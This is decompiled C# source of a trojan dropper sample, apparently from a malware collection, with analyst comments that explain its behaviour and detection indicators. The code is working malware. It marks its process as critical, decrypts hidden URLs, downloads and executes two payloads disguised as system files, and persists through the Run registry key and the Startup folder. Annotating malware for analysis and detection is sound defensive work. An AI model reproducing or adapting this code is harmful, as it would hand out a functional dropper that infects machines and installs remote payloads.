// Decompiled with JetBrains decompiler
// Type: vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ
// Assembly: Downloader, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 8B96CE03-B080-4512-8CC1-7DDE95F54AAA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.bfcm-c01557638a82910361f2149b9432ad8f42d2d17a53d31917bcdb34e91acc08e6.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.Net;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
/// <summary>
/// Entry class of the decompiled "Downloader" assembly; identifiers are kept exactly as the
/// decompiler emitted them (they are obfuscated in the sample).
/// Analyst summary: Main downloads two executables from addresses that are stored encrypted,
/// starts each one, and writes an HKCU Run autostart value. Every failure is swallowed silently.
/// </summary>
internal static class vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ
{
    // P/Invoke into ntdll. The int return value (an NTSTATUS) is never inspected by the callers
    // in this class, so a failed call goes unnoticed by the sample itself.
    [DllImport("ntdll")]
    private static extern int NtSetInformationProcess(IntPtr p, int c, ref int i, int l);

    /// <summary>
    /// Program entry point: two near-identical download / execute / persist stages, bracketed
    /// by two NtSetInformationProcess calls on the current process.
    /// </summary>
    public static void Main()
    {
        // Information class 29 is ProcessBreakOnTermination in the commonly documented
        // PROCESSINFOCLASS enumeration; writing 1 flags the process as critical, so terminating
        // it while the flag is set bugchecks the host. The last argument (4) is the size of the int.
        // NOTE(review): setting this flag normally requires SeDebugPrivilege - confirm whether
        // the call succeeds on the analysis host, since the status is discarded here.
        int i1 = 1;
        vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ.NtSetInformationProcess(Process.GetCurrentProcess().Handle, 29, ref i1, 4);
        try
        {
            // Stage 1: payload path is <Windows system directory>\WindowsFirewall.exe.
            // Presumably named to pass as a Windows component; a file with this name in the
            // system directory is a host indicator worth checking.
            string fileName = Environment.GetFolderPath(Environment.SpecialFolder.System) + "\\WindowsFirewall.exe";
            // The download address is not stored in clear text; it is recovered at run time by
            // the decryption helper below and passed straight to WebClient.DownloadFile.
            new WebClient().DownloadFile(vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ.ÍƾYjƔơƻƄT("K4grycAwDMKvf6NsgqFQJA5PuoMdteIUZs7xA+9DovkArANHKiv+rqzid4MVJn5b"), fileName);
            // The downloaded file is executed immediately, before persistence is written.
            Process.Start(fileName);
            // Persistence: per-user Run key, value name "Client Runtime Service", data = payload path.
            // This key/value pair is a stable registry indicator for detection and clean-up.
            Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("Client Runtime Service", (object) fileName);
        }
        catch
        {
            // Empty handler: any failure in stage 1 (download, write access to the system
            // directory, process start, registry access) is swallowed and stage 2 still runs.
        }
        try
        {
            // Stage 2: payload path is <per-user Startup folder>\crss.exe. The name presumably
            // imitates csrss.exe. Files in the Startup folder are launched at logon, so this is a
            // second persistence mechanism that does not depend on the Run value.
            string fileName = Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\crss.exe";
            // This literal shares its first two 16-byte ciphertext blocks with the stage-1
            // literal; under ECB that means the first 32 plaintext bytes of both addresses match.
            new WebClient().DownloadFile(vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ.ÍƾYjƔơƻƄT("K4grycAwDMKvf6NsgqFQJA5PuoMdteIUZs7xA+9Dovl1hmWyr2yTB16aQjN0YI1t"), fileName);
            Process.Start(fileName);
            // Same Run value name as stage 1: if both stages succeed, the value ends up pointing
            // at the stage-2 path because the second write replaces the first.
            Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("Client Runtime Service", (object) fileName);
        }
        catch
        {
            // Empty handler: stage-2 failures are swallowed as well.
        }
        // Writes 0 to the same information class, clearing the flag set at the top of Main
        // before the process exits.
        int i2 = 0;
        vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ.NtSetInformationProcess(Process.GetCurrentProcess().Handle, 29, ref i2, 4);
    }

    /// <summary>
    /// String de-obfuscation helper: Base64-decodes the argument and decrypts it with Rijndael
    /// in ECB mode, using a key built from the MD5 of the hard-coded ASCII string "u y".
    /// </summary>
    /// <param name="ƋLƉnhCƕaƻưƗȞƙnƘռyƁzռPƉÂ">Base64-encoded ciphertext.</param>
    /// <returns>The decrypted bytes interpreted as ASCII text.</returns>
    private static string ÍƾYjƔơƻƄT(string ƋLƉnhCƕaƻưƗȞƙnƘռyƁzռPƉÂ)
    {
        RijndaelManaged rijndaelManaged = new RijndaelManaged();
        MD5CryptoServiceProvider cryptoServiceProvider = new MD5CryptoServiceProvider();
        // 32-byte buffer, i.e. a 256-bit key.
        byte[] destinationArray = new byte[32];
        byte[] hash = cryptoServiceProvider.ComputeHash(Encoding.ASCII.GetBytes("u y"));
        // Bytes 0-15 receive the 16-byte MD5 digest.
        Array.Copy((Array) hash, 0, (Array) destinationArray, 0, 16);
        // The second copy starts at offset 15, not 16: byte 15 is overwritten with hash[0],
        // bytes 15-30 hold the digest again, and byte 31 stays zero. Any analysis tooling that
        // re-implements this routine for configuration extraction has to reproduce this layout.
        Array.Copy((Array) hash, 0, (Array) destinationArray, 15, 16);
        rijndaelManaged.Key = destinationArray;
        // ECB uses no IV; equal plaintext blocks produce equal ciphertext blocks. Padding and
        // BlockSize are not set here, so the RijndaelManaged defaults apply.
        rijndaelManaged.Mode = CipherMode.ECB;
        ICryptoTransform decryptor = rijndaelManaged.CreateDecryptor();
        byte[] inputBuffer = Convert.FromBase64String(ƋLƉnhCƕaƻưƗȞƙnƘռyƁzռPƉÂ);
        return Encoding.ASCII.GetString(decryptor.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length));
    }
}